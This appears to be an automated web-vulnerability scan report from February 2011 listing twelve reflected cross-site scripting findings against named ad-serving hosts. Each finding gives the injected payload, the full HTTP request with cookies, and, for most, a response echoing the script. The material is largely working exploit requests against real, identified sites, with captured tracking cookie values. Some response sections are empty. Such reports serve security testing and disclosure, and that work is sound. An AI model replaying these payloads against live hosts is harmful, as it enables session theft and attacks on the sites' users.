DORK Report, Cross Site Scripting, 2-14-2011, XSS, CWE-79, CAPEC-86

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

1.1. http://a.collective-media.net/ad/cm.dailymail/ron_052010 [REST URL parameter 1] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/ad/cm.dailymail/ron_052010

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a3b2a<script>alert(1)</script>2a020577f18 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ada3b2a<script>alert(1)</script>2a020577f18/cm.dailymail/ron_052010;sz=300x250;ord=3461791? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; dc=dc; mmpg=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 113
Date: Mon, 14 Feb 2011 01:37:38 GMT
Connection: close
Vary: Accept-Encoding

unknown path /ada3b2a<script>alert(1)</script>2a020577f18/cm.dailymail/ron_052010;cmw=nurl;sz=300x250;ord=3461791

1.2. http://a.collective-media.net/ad/cm.drudgerep/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/ad/cm.drudgerep/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 91f06<script>alert(1)</script>bbd480d1b59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad91f06<script>alert(1)</script>bbd480d1b59/cm.drudgerep/;sz=300x250;click0=;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 115
Date: Mon, 14 Feb 2011 02:10:23 GMT
Connection: close
Vary: Accept-Encoding

unknown path /ad91f06<script>alert(1)</script>bbd480d1b59/cm.drudgerep/;cmw=nurl;sz=300x250;click0=;ord=[timestamp]

1.3. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.dailymail/ron_052010

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2dc11'-alert(1)-'c06cd63375f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.dailymail2dc11'-alert(1)-'c06cd63375f/ron_052010;sz=300x250;ord=3412338? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; dc=dc

Response

1.4. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.dailymail/ron_052010

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6de2b'-alert(1)-'8f8feffd6d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.dailymail/ron_0520106de2b'-alert(1)-'8f8feffd6d6;sz=300x250;ord=3412338? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; dc=dc

Response

1.5. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.dailymail/ron_052010

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e360'-alert(1)-'b71794fc123 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.dailymail/ron_052010;sz=300x250;ord=3412338?&9e360'-alert(1)-'b71794fc123=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; dc=dc

Response

1.6. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.dailymail/ron_052010

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7086'-alert(1)-'ae7eaada4f3 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.dailymail/ron_052010;sz=300x250;ord=3412338?d7086'-alert(1)-'ae7eaada4f3 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; dc=dc

Response

1.7. http://a.collective-media.net/adj/cm.drudgerep/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.drudgerep/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22425'-alert(1)-'80a6204c2ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.drudgerep22425'-alert(1)-'80a6204c2ff/;sz=300x250;click0=;ord=$cacheBuster$ HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

1.8. http://a.collective-media.net/adj/cm.drudgerep/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.drudgerep/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4b37'-alert(1)-'600aca90b1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.drudgerep/;sz=300x250;click0=;ord=$cacheBuster$&d4b37'-alert(1)-'600aca90b1e=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

1.9. http://a.collective-media.net/adj/cm.drudgerep/ [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.drudgerep/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b527'-alert(1)-'c296858d3f2 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.drudgerep/;sz=300x250;click0=;ord=$cacheBuster$1b527'-alert(1)-'c296858d3f2 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

1.10. http://a.rfihub.com/sed [pa parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.rfihub.com
Path:	/sed

Issue detail

The value of the pa request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7e6c4'><script>alert(1)</script>cd7c8900c9b was submitted in the pa parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre6473367353167e6c4'><script>alert(1)</script>cd7c8900c9b&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a1=1CAESEDwKxKPrWufjyLofYqzf4_4; t=1296740537347; a=c369013694478760033; o=1-BjMxrfcI6jt9; r=1296740536014; k="aAJBlvOUA==AGnmc809AN1288024309000AAABLgCILYI=AGnmc801AN1288021692000AAABLgCILYI=AGnmc829AN1288026445000AAABLgCILYI=AGnmc736AN1288018708000AAABLgCILYI=AGnmc805AN1288021876000AAABLgCILYI=AGnmc825AN1288026116000AAABLgCILYI=AGnmc773AN1288019600000AAABLgCILYI=AGnmc747AN1288024980000AAABLgCILYI=AGnmc748AN1288024901000AAABLgCILYI="; s="aAE-DNNhg==AE9479AN1294103956000AAABLgq3o_Y=AF12446AN1285279980000AAABLgq3o_Y=AE9438AN1273618082000AAABLgBpdhw=AE8438AN1275963655000AAABLgBpdhw="; b="aAMN9qejw==AD741AAABLgrfWIY=AD793AAABLgrfWIY=AD809AAABLgrfWIY=AD825AAABLgrfWIY=AD736AAABLgrfWIY=AD781AAABLgrfWIY=AD829AAABLgrfWIY=AD748AAABLgrfWIY=AD801AAABLgrfWIY=AD773AAABLgrfWIY=AD747AAABLgrfWIY=AD805AAABLgBphCs="; m="aAGRcyqzg==AI20472726AAABLgrfWIc=AI20472726AAABLgrTunc=AI20472726AAABLgq3K4s=AI20472726AAABLgBphCw=AI20472701AAABLffM4Y0=AI20472701AAABLevCTs8="; g="aAG9rzUwA==A_aBXkOpUe5j7vA|15706|73437|68086|14121|1243|92405|445|32981|7792AAABLhsS7_s=A_akezhu0C40Skt|15706|73437|68086|14121|1243|92405|445|32981|7792AAABLhsSR2I=A_a2pwDXuoO-PeR|15705|73433|68086|14121|1243|92574|445|32521|7792AAABLgq3o_o=A_a9RXWgJTWnNNS|14969|69553|60848|13007|1144|90136|306|32226|7317AAABLgCILYY=A_aFWCVjo6agoYc|16569|76934|70571|14534|1277|92574|445|32490|7755AAABLgBpfaE=A9aTqK7H67WacJ_|9542|45408|51494|13737|830|92405|445|29513|7557AAABLgBpdh8="; c="aAh4fa6Qg==AFd1243AB3AAABLhsS7_c=AFv2946AB3AAABLhsS7_c=AGu14941AB3AAABLhsS7_c=AFc1243AB3AAABLhsS7_c=AFl2946AB3AAABLhsS7_c=AGt14941AB3AAABLhsS7_c=AGb15706AB2AAABLhsS7_c=AGa15706AB2AAABLhsS7_c=AGb15705AB1AAABLgq3o_Y=AGa15705AB1AAABLgq3o_Y=AFd1144AB1AAABLgCILYI=AFv2383AB1AAABLgCILYI=AGu11341AB1AAABLgCILYI=AFc1144AB1AAABLgCILYI=AFl2383AB1AAABLgCILYI=AGb14969AB1AAABLgCILYI=AGa14969AB1AAABLgCILYI=AFd1277AB1AAABLgBpfZ4=AFv3000AB1AAABLgBpfZ4=AGu15506AB1AAABLgBpfZ4=AFc1277AB1AAABLgBpfZ4=AFl3000AB1AAABLgBpfZ4=AGt15506AB1AAABLgBpfZ4=AGb16569AB1AAABLgBpfZ4=AGa16569AB1AAABLgBpfZ4=AEd830AB1AAABLgBpdhw=AFv1265AB1AAABLgBpdhw=AFu5385AB1AAABLgBpdhw=AEc830AB1AAABLgBpdhw=AFl1265AB1AAABLgBpdhw=AFt5385AB1AAABLgBpdhw=AFb9542AB1AAABLgBpdhw=AFa9542AB1AAABLgBpdhw="; f="aAFSdsTtQ==AK1297534306AB2AAABLhsS7_c=AK1297259930AB2AAABLgrfWIY=AK1297087034AB4AAABLgCILYI=AK1296942555AB1AAABLffM4Y0=AK1296740536AB1AAABLevCTs4="; e=cd

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Content-Type: text/html; charset=iso-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: g="aAHN7Dy1Q==A_ax3hqHhIaQ7kH|15705|73433|68086|14121|1243|92574|445|32981|7792AAABLiHOrUw=A_aBXkOpUe5j7vA|15706|73437|68086|14121|1243|92405|445|32981|7792AAABLhsS7_s=A_akezhu0C40Skt|15706|73437|68086|14121|1243|92405|445|32981|7792AAABLhsSR2I=A_a2pwDXuoO-PeR|15705|73433|68086|14121|1243|92574|445|32521|7792AAABLgq3o_o=A_a9RXWgJTWnNNS|14969|69553|60848|13007|1144|90136|306|32226|7317AAABLgCILYY=A_aFWCVjo6agoYc|16569|76934|70571|14534|1277|92574|445|32490|7755AAABLgBpfaE=A9aTqK7H67WacJ_|9542|45408|51494|13737|830|92405|445|29513|7557AAABLgBpdh8=";Path=/;Domain=.rfihub.com;Expires=Wed, 15-Aug-12 01:35:16 GMT
Set-Cookie: c="aAh0Fw84g==AFd1243AB4AAABLiHOrUg=AFv2946AB4AAABLiHOrUg=AGu14941AB4AAABLiHOrUg=AFc1243AB4AAABLiHOrUg=AFl2946AB4AAABLiHOrUg=AGt14941AB4AAABLiHOrUg=AGb15705AB2AAABLiHOrUg=AGa15705AB2AAABLiHOrUg=AGb15706AB2AAABLhsS7_c=AGa15706AB2AAABLhsS7_c=AFd1144AB1AAABLgCILYI=AFv2383AB1AAABLgCILYI=AGu11341AB1AAABLgCILYI=AFc1144AB1AAABLgCILYI=AFl2383AB1AAABLgCILYI=AGb14969AB1AAABLgCILYI=AGa14969AB1AAABLgCILYI=AFd1277AB1AAABLgBpfZ4=AFv3000AB1AAABLgBpfZ4=AGu15506AB1AAABLgBpfZ4=AFc1277AB1AAABLgBpfZ4=AFl3000AB1AAABLgBpfZ4=AGt15506AB1AAABLgBpfZ4=AGb16569AB1AAABLgBpfZ4=AGa16569AB1AAABLgBpfZ4=AEd830AB1AAABLgBpdhw=AFv1265AB1AAABLgBpdhw=AFu5385AB1AAABLgBpdhw=AEc830AB1AAABLgBpdhw=AFl1265AB1AAABLgBpdhw=AFt5385AB1AAABLgBpdhw=AFb9542AB1AAABLgBpdhw=AFa9542AB1AAABLgBpdhw=";Path=/;Domain=.rfihub.com;Expires=Wed, 15-Aug-12 01:35:16 GMT
Set-Cookie: f="aAGmgjuLw==AK1297647316AB1AAABLiHOrUg=AK1297534306AB2AAABLhsS7_c=AK1297259930AB2AAABLgrfWIY=AK1297087034AB4AAABLgCILYI=AK1296942555AB1AAABLffM4Y0=AK1296740536AB1AAABLevCTs4=";Path=/;Domain=.rfihub.com;Expires=Wed, 15-Aug-12 01:35:16 GMT
Set-Cookie: e=cb;Path=/;Domain=.rfihub.com;Expires=Wed, 15-Aug-12 01:35:16 GMT
Content-Length: 2175

<html><body><span id="__rfi" style="height:0px; width:0px"><IFRAME SRC="http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297647316296;click=http://a.rfihub.com/aci
...[SNIP]...
border=0 width=0 height=0 src='http://a.rfihub.com/tk.gif?rb=445&re=19969&aa=15705,73433,14121,68086,1243,14941,x3hqHhIaQ7kH,http%3A%2F%2Frocketfuelinc.com,776,2946,32981,1879,7792&pa=ppre6473367353167e6c4'><script>alert(1)</script>cd7c8900c9b&id=&ra=6473163000.11331372547018437'>
...[SNIP]...

1.11. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3740.270604.B3/B5123509.61

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc59a"-alert(1)-"ed8a505e8a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297647300104;click=http://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5&dc59a"-alert(1)-"ed8a505e8a7=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6107

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
okv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5&dc59a"-alert(1)-"ed8a505e8a7=1http%3a%2f%2ft.mookie1.com/t/v1/clk%3FmigAgencyId%3D188%26migSource%3Dadsrv2%26migTrackDataExt%3D2426847%3B58824910%3B234278619%3B39992677%26migRandom%3D2161819%26migTrackFmtExt%3Dclient%3Bio%3Bad%3B
...[SNIP]...

1.12. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3740.270604.B3/B5123509.61

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcff3"-alert(1)-"0f153e75e05 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297647300104;click=http://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5bcff3"-alert(1)-"0f153e75e05 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:35:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6007

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
